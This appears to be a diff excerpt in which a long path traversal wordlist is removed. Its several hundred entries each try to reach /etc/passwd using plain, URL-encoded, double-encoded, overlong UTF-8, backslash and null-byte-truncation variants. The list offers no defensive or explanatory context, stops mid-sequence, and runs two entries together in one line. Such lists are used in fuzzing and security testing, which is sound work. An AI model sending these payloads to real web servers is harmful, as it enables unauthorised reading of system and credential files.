+0,0 @@ -..//etc/passwd -../..//etc/passwd -../../..//etc/passwd -../../../..//etc/passwd -../../../../..//etc/passwd -../../../../../..//etc/passwd -../../../../../../..//etc/passwd -../../../../../../../..//etc/passwd -..%2f/etc/passwd -..%2f..%2f/etc/passwd -..%2f..%2f..%2f/etc/passwd -..%2f..%2f..%2f..%2f/etc/passwd -..%2f..%2f..%2f..%2f..%2f/etc/passwd -..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd -..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd -%2e%2e//etc/passwd -%2e%2e/%2e%2e//etc/passwd -%2e%2e/%2e%2e/%2e%2e//etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd -%2e%2e%2f/etc/passwd -%2e%2e%2f%2e%2e%2f/etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -..%252f/etc/passwd -..%252f..%252f/etc/passwd -..%252f..%252f..%252f/etc/passwd -..%252f..%252f..%252f..%252f/etc/passwd -..%252f..%252f..%252f..%252f..%252f/etc/passwd -..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd -..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd -%252e%252e//etc/passwd -%252e%252e/%252e%252e//etc/passwd -%252e%252e/%252e%252e/%252e%252e//etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd -%252e%252e%252f/etc/passwd -%252e%252e%252f%252e%252e%252f/etc/passwd -%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd -..\/etc/passwd -..\..\/etc/passwd -..\..\..\/etc/passwd -..\..\..\..\/etc/passwd -..\..\..\..\..\/etc/passwd -..\..\..\..\..\..\/etc/passwd -..\..\..\..\..\..\..\/etc/passwd -..\..\..\..\..\..\..\..\/etc/passwd -..%255c/etc/passwd -..%255c..%255c/etc/passwd -..%255c..%255c..%255c/etc/passwd -..%255c..%255c..%255c..%255c/etc/passwd -..%255c..%255c..%255c..%255c..%255c/etc/passwd -..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd -..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd -%252e%252e\/etc/passwd -%252e%252e\%252e%252e\/etc/passwd..%5c/etc/passwd -..%5c..%5c/etc/passwd -..%5c..%5c..%5c/etc/passwd -..%5c..%5c..%5c..%5c/etc/passwd -..%5c..%5c..%5c..%5c..%5c/etc/passwd -..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd -..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd -%2e%2e\/etc/passwd -%2e%2e\%2e%2e\/etc/passwd -%2e%2e\%2e%2e\%2e%2e\/etc/passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd -%2e%2e%5c/etc/passwd -%2e%2e%5c%2e%2e%5c/etc/passwd -%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -%252e%252e\%252e%252e\%252e%252e\/etc/passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd -%252e%252e%255c/etc/passwd -%252e%252e%255c%252e%252e%255c/etc/passwd -%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd -..%c0%af/etc/passwd -..%c0%af..%c0%af/etc/passwd -..%c0%af..%c0%af..%c0%af/etc/passwd -..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd -..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd -%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd -%c0%ae%c0%ae%c0%af/etc/passwd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd -%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd -..%25c0%25af/etc/passwd -..%25c0%25af..%25c0%25af/etc/passwd -..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd -..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae//etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd -..%c1%9c/etc/passwd -..%c1%9c..%c1%9c/etc/passwd -..%c1%9c..%c1%9c..%c1%9c/etc/passwd -..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd -..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd -%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\/etc/passwd -%c0%ae%c0%ae%c1%9c/etc/passwd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd -%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd -..%25c1%259c/etc/passwd -..%25c1%259c..%25c1%259c/etc/passwd -..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd -..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd -..%%32%66/etc/passwd -..%%32%66..%%32%66/etc/passwd -..%%32%66..%%32%66..%%32%66/etc/passwd -..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd -..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd -%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65%%32%66/etc/passwd -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd -%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd -..%%35%63/etc/passwd -..%%35%63..%%35%63/etc/passwd -..%%35%63..%%35%63..%%35%63/etc/passwd -..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd -..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63/etc/passwd -%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd -%%32%65%%32%65%%35%63/etc/passwd -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd -%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63/etc/passwd -..//etc/passwd%00index.html -../..//etc/passwd%00index.html -../../..//etc/passwd%00index.html -../../../..//etc/passwd%00index.html -../../../../..//etc/passwd%00index.html -../../../../../..//etc/passwd%00index.html -../../../../../../..//etc/passwd%00index.html -../../../../../../../..//etc/passwd%00index.html -..%2f/etc/passwd%00index.html -..%2f..%2f/etc/passwd%00index.html -..%2f..%2f..%2f/etc/passwd%00index.html -..%2f..%2f..%2f..%2f/etc/passwd%00index.html -..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html -..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html -..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd%00index.html -%2e%2e//etc/passwd%00index.html -%2e%2e/%2e%2e//etc/passwd%00index.html -%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd%00index.html -%2e%2e%2f/etc/passwd%00index.html -%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd%00index.html -..%252f/etc/passwd%00index.html -..%252f..%252f/etc/passwd%00index.html -..%252f..%252f..%252f/etc/passwd%00index.html -..%252f..%252f..%252f..%252f/etc/passwd%00index.html -..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html -..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html -..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd%00index.html -%252e%252e//etc/passwd%00index.html -%252e%252e/%252e%252e//etc/passwd%00index.html -%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html 